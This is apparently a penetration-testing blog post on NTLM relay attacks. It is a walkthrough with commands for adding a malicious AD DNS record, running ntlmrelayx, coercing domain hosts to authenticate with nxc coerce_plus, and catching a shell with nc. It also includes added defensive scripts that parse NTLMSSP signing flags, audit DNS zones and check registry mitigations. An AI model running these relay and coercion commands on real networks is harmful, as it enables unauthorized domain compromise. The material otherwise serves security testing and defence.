NTLM Relay

NTLM Relay is a man-in-the-middle (MITM) attack against the NTLM authentication protocol. When an NTLM authentication occurs between two machines (a client and a server), an attacker can:

  1. Intercept or coerce an authentication attempt.
  2. Relay that authentication request to another server.
  3. Authenticate to the target server as the victim — without knowing the victim’s password.

In short, NTLM Relay abuses NTLM’s lack of mutual authentication and the absence (or misconfiguration) of message signing.
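
The signing the paragraph refers to is negotiated through the NegotiateFlags field carried in every NTLMSSP message. The following Python script is an added example (not code from the original post or from any tool it mentions) that locates that field in the three message types defined by MS-NLMP and reports whether the signing and sealing bits are present. The two sample messages are constructed inline, one with the signing bits set and one with them cleared, so the script runs offline; the flag values and field offsets are the ones documented in MS-NLMP.

```python
import struct

# NTLMSSP framing from MS-NLMP: 8-byte signature, then a 32-bit little-endian message type.
NTLMSSP_SIGNATURE = b"NTLMSSP\x00"
NEGOTIATE, CHALLENGE, AUTHENTICATE = 1, 2, 3

# Byte offset of NegotiateFlags in NEGOTIATE (2.2.1.1), CHALLENGE (2.2.1.2), AUTHENTICATE (2.2.1.3).
FLAGS_OFFSET = {NEGOTIATE: 12, CHALLENGE: 20, AUTHENTICATE: 60}

# Subset of NegotiateFlags bits (MS-NLMP 2.2.2.5) that matter for integrity/confidentiality.
NEGOTIATE_FLAGS = {
    0x00000001: "NTLMSSP_NEGOTIATE_UNICODE",
    0x00000004: "NTLMSSP_REQUEST_TARGET",
    0x00000010: "NTLMSSP_NEGOTIATE_SIGN",
    0x00000020: "NTLMSSP_NEGOTIATE_SEAL",
    0x00000200: "NTLMSSP_NEGOTIATE_NTLM",
    0x00008000: "NTLMSSP_NEGOTIATE_ALWAYS_SIGN",
    0x00080000: "NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY",
    0x20000000: "NTLMSSP_NEGOTIATE_128",
    0x40000000: "NTLMSSP_NEGOTIATE_KEY_EXCH",
    0x80000000: "NTLMSSP_NEGOTIATE_56",
}


def parse_negotiate_flags(blob: bytes) -> dict:
    """Return the message type, the raw NegotiateFlags and the set of named bits."""
    if len(blob) < 12 or blob[:8] != NTLMSSP_SIGNATURE:
        raise ValueError("not an NTLMSSP message")
    msg_type = struct.unpack_from("<I", blob, 8)[0]
    if msg_type not in FLAGS_OFFSET:
        raise ValueError(f"unknown NTLMSSP message type {msg_type}")
    offset = FLAGS_OFFSET[msg_type]
    if len(blob) < offset + 4:
        raise ValueError("message truncated before NegotiateFlags")
    flags = struct.unpack_from("<I", blob, offset)[0]
    names = {name for bit, name in NEGOTIATE_FLAGS.items() if flags & bit}
    return {"type": msg_type, "flags": flags, "names": names}


def signing_assessment(flags: int) -> dict:
    """Summarise the integrity-related bits. These express what a party asks for;
    whether messages are actually signed is decided by the application protocol
    (SMB signing, LDAP signing/channel binding), which is why server-side enforcement matters."""
    return {
        "sign": bool(flags & 0x00000010),
        "seal": bool(flags & 0x00000020),
        "always_sign": bool(flags & 0x00008000),
        "key_exchange": bool(flags & 0x40000000),
        "extended_session_security": bool(flags & 0x00080000),
    }


def build_negotiate(flags: int) -> bytes:
    """Constructed NEGOTIATE_MESSAGE with empty DomainName/Workstation fields (sample input, not a capture)."""
    empty_field = struct.pack("<HHI", 0, 0, 0)  # Len, MaxLen, BufferOffset
    return NTLMSSP_SIGNATURE + struct.pack("<II", NEGOTIATE, flags) + empty_field * 2 + bytes(8)


def build_challenge(flags: int, server_challenge: bytes = bytes(8)) -> bytes:
    """Constructed CHALLENGE_MESSAGE: TargetName fields precede the flags, hence offset 20."""
    empty_field = struct.pack("<HHI", 0, 0, 0)
    return (NTLMSSP_SIGNATURE + struct.pack("<I", CHALLENGE) + empty_field
            + struct.pack("<I", flags) + server_challenge + bytes(8) + empty_field + bytes(8))


# Constructed flag sets: a client asking for signing/sealing, and the same set with those bits cleared.
SIGNING_FLAGS = (0x00000001 | 0x00000004 | 0x00000010 | 0x00000020 | 0x00000200
                 | 0x00008000 | 0x00080000 | 0x20000000 | 0x40000000 | 0x80000000)
STRIPPED_FLAGS = SIGNING_FLAGS & ~(0x00000010 | 0x00000020 | 0x00008000 | 0x40000000)

if __name__ == "__main__":
    for label, blob in (("negotiate", build_negotiate(SIGNING_FLAGS)),
                        ("negotiate-stripped", build_negotiate(STRIPPED_FLAGS)),
                        ("challenge", build_challenge(SIGNING_FLAGS))):
        parsed = parse_negotiate_flags(blob)
        print(label, hex(parsed["flags"]), signing_assessment(parsed["flags"]))
```

The same parser applies to an NTLMSSP blob pulled out of an SMB session setup, an HTTP `Authorization: NTLM` header (after base64 decoding) or an LDAP bind, which makes it a convenient way to confirm from a capture what the two endpoints actually asked for.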

First Method

⚙️ Setting Up a Malicious DNS Record (using dnstool.py)

python3 dnstool.py -u '$domain\$user' -p '$pass' <Full-DC-Name> -a add -r 'localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA' -d '$attacker_ip' -dns-ip $target_ip --tcp

What this does: creates a DNS record in the domain's zone that maps a hostname under the attacker's control to the attacker's machine, so any host that resolves that name connects to the attacker's IP.

🧾 Verify the DNS Entry

dig localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA.$domain @<Full-DC-Name> +tcp +short
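
The record created in this step is also what a defender can look for. The following Python script is an added example, not code from the original post, that audits a list of zone records for three signals: a hostname label that looks like base64-encoded data rather than a name (long, base64 alphabet only, with the run of `A` characters that zero padding produces), a record owned by an ordinary user account rather than a DNS administrator or a machine account, and an address outside the subnets where servers are expected. The subnets, owner names and records are constructed for the example and would be replaced by an export of the real zone (for instance from the DNS server's management tools).

```python
import ipaddress
import re

# Assumed environment facts (adjust to the real zone): where server A records normally live,
# and which principals legitimately create records by hand.
SERVER_SUBNETS = [ipaddress.ip_network("10.0.0.0/24")]
PRIVILEGED_OWNERS = {"CORP\\Domain Admins", "CORP\\DnsAdmins", "NT AUTHORITY\\SYSTEM"}

# Hostname labels normally contain letters, digits and hyphens in short words; a long label drawn
# purely from the base64 alphabet is the signature of encoded data.
BASE64_LABEL = re.compile(r"^[A-Za-z0-9+/=]{24,}$")


def looks_like_encoded_label(label: str) -> bool:
    """Heuristic: long, base64-only and containing a run of 'A' (base64 of zero bytes)."""
    return bool(BASE64_LABEL.match(label)) and "AAAAAA" in label


def owner_is_expected(owner: str) -> bool:
    """Machine accounts (trailing '$') register their own records via dynamic update, which is normal."""
    return owner in PRIVILEGED_OWNERS or owner.endswith("$")


def audit_zone(records: list) -> list:
    """Return the records that trip at least one heuristic, strongest (most reasons) first."""
    findings = []
    for rec in records:
        reasons = []
        label = rec["name"].split(".")[0]
        if looks_like_encoded_label(label):
            reasons.append("label looks like base64-encoded data")
        if not owner_is_expected(rec["owner"]):
            reasons.append(f"owned by non-privileged user {rec['owner']}")
        if rec["type"] == "A":
            addr = ipaddress.ip_address(rec["data"])
            if not any(addr in net for net in SERVER_SUBNETS):
                reasons.append(f"points outside expected server subnets ({rec['data']})")
        if reasons:
            findings.append({"name": rec["name"], "reasons": reasons})
    findings.sort(key=lambda f: len(f["reasons"]), reverse=True)
    return findings


# Constructed sample zone export: two admin-created server records, one machine-registered
# printer, and one record shaped like the one created in the step above.
SAMPLE_RECORDS = [
    {"name": "dc01", "type": "A", "data": "10.0.0.10", "owner": "CORP\\Domain Admins"},
    {"name": "files01", "type": "A", "data": "10.0.0.20", "owner": "CORP\\DnsAdmins"},
    {"name": "printer07", "type": "A", "data": "10.0.50.12", "owner": "CORP\\PRINTER07$"},
    {"name": "localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA", "type": "A",
     "data": "10.0.50.77", "owner": "CORP\\jdoe"},
]

if __name__ == "__main__":
    for finding in audit_zone(SAMPLE_RECORDS):
        print(finding["name"])
        for reason in finding["reasons"]:
            print("   -", reason)
```

The owner check is the most reliable of the three: in an AD-integrated zone authenticated users can create records by default, so a record owned by a user account rather than an administrator or a machine account is worth a look even when its name and address look ordinary. The printer record in the sample shows the expected noise from the subnet heuristic alone.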

🧨 Start the NTLM Relay Server

The relay server listens for incoming NTLM authentications and relays them to the target service. Example targets include WinRM, SMB, LDAP, LDAPS, etc.

# replace $Protocol with winrm, smb, ldap, etc.
ntlmrelayx.py -smb2support -t '$Protocol://$target'

🧨 Coerce a Victim Machine to Authenticate to You

Use coercion modules to force a system (for example, a domain controller or other host) to authenticate to the malicious hostname you created.

nxc smb $ip -u $user -p '$pass' -M coerce_plus -o LISTENER=localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA ALWAYS=true

🔓 Catch the Shell (if configured to spawn one)

nc localhost 11000

Second Method

Coming soon…


Notes & Recommendations

  • Replace variables (like $domain, $user, $pass, $attacker_ip, and $target_ip) with real values relevant to your environment.
  • Exercise caution: performing these techniques without authorization is illegal and unethical. Use only on systems you own or where you have explicit permission to test.
  • For defense, consider: enabling SMB signing and LDAP channel binding, disabling or restricting NTLM, applying Microsoft’s recommended mitigations, and monitoring for suspicious coercion activity.
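The defensive measures in the last bullet are all backed by registry values on the hosts involved, whether set by hand or through Group Policy. The following Python script is an added example, not from the original post, that reads those values and reports whether each control is enforced, merely audited, or left at the OS default. The registry paths and value meanings are Microsoft's documented ones; the choice of controls and the thresholds counted as "enforced" are an assumed baseline, and the sample settings used when the script is not run on Windows are constructed.

```python
import sys

# Registry-backed settings behind each mitigation. Paths are relative to HKEY_LOCAL_MACHINE;
# "enforced" lists the DWORD values that make the control mandatory rather than audit-only.
CHECKS = [
    {"control": "SMB server signing required",
     "key": r"SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters",
     "value": "RequireSecuritySignature", "enforced": {1}},
    {"control": "SMB client signing required",
     "key": r"SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters",
     "value": "RequireSecuritySignature", "enforced": {1}},
    {"control": "LDAP server signing required (domain controllers)",
     "key": r"SYSTEM\CurrentControlSet\Services\NTDS\Parameters",
     "value": "LDAPServerIntegrity", "enforced": {2}},          # 2 = require signing
    {"control": "LDAP channel binding always (domain controllers)",
     "key": r"SYSTEM\CurrentControlSet\Services\NTDS\Parameters",
     "value": "LdapEnforceChannelBinding", "enforced": {2}},    # 0 never, 1 when supported, 2 always
    {"control": "Outgoing NTLM traffic denied",
     "key": r"SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0",
     "value": "RestrictSendingNTLMTraffic", "enforced": {2}},   # 1 = audit only, 2 = deny all
    {"control": "Incoming NTLM traffic denied",
     "key": r"SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0",
     "value": "RestrictReceivingNTLMTraffic", "enforced": {2}}, # 2 = deny all accounts
]


def evaluate(settings: dict) -> list:
    """settings maps (key, value_name) -> DWORD, or None / missing when the value is absent."""
    results = []
    for check in CHECKS:
        observed = settings.get((check["key"], check["value"]))
        if observed is None:
            status = "not configured (OS default applies)"
        elif observed in check["enforced"]:
            status = "enforced"
        else:
            status = "not enforced"
        results.append({"control": check["control"], "observed": observed, "status": status})
    return results


def collect_from_registry() -> dict:
    """Read the live values on a Windows host; a missing key or value is recorded as None."""
    if sys.platform != "win32":
        raise RuntimeError("registry collection only works on Windows")
    import winreg  # standard library on Windows only
    settings = {}
    for check in CHECKS:
        try:
            with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, check["key"]) as key:
                settings[(check["key"], check["value"])] = winreg.QueryValueEx(key, check["value"])[0]
        except OSError:
            settings[(check["key"], check["value"])] = None
    return settings


# Constructed sample: a member server with SMB server signing on, client signing off,
# outbound NTLM restriction in audit mode only, and nothing else configured.
SAMPLE_SETTINGS = {
    (r"SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters", "RequireSecuritySignature"): 1,
    (r"SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters", "RequireSecuritySignature"): 0,
    (r"SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0", "RestrictSendingNTLMTraffic"): 1,
}

if __name__ == "__main__":
    settings = collect_from_registry() if sys.platform == "win32" else SAMPLE_SETTINGS
    for result in evaluate(settings):
        print(f"{result['status']:<35} {result['control']} (observed={result['observed']})")
```

Audit-mode values (for example `RestrictSendingNTLMTraffic` = 1) are a useful intermediate step because they populate the NTLM audit events that show which hosts and applications would break under a deny policy, but they do nothing against a relay, which is why the script reports them as "not enforced" rather than as a pass.
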

This post is licensed under CC BY 4.0 by the author.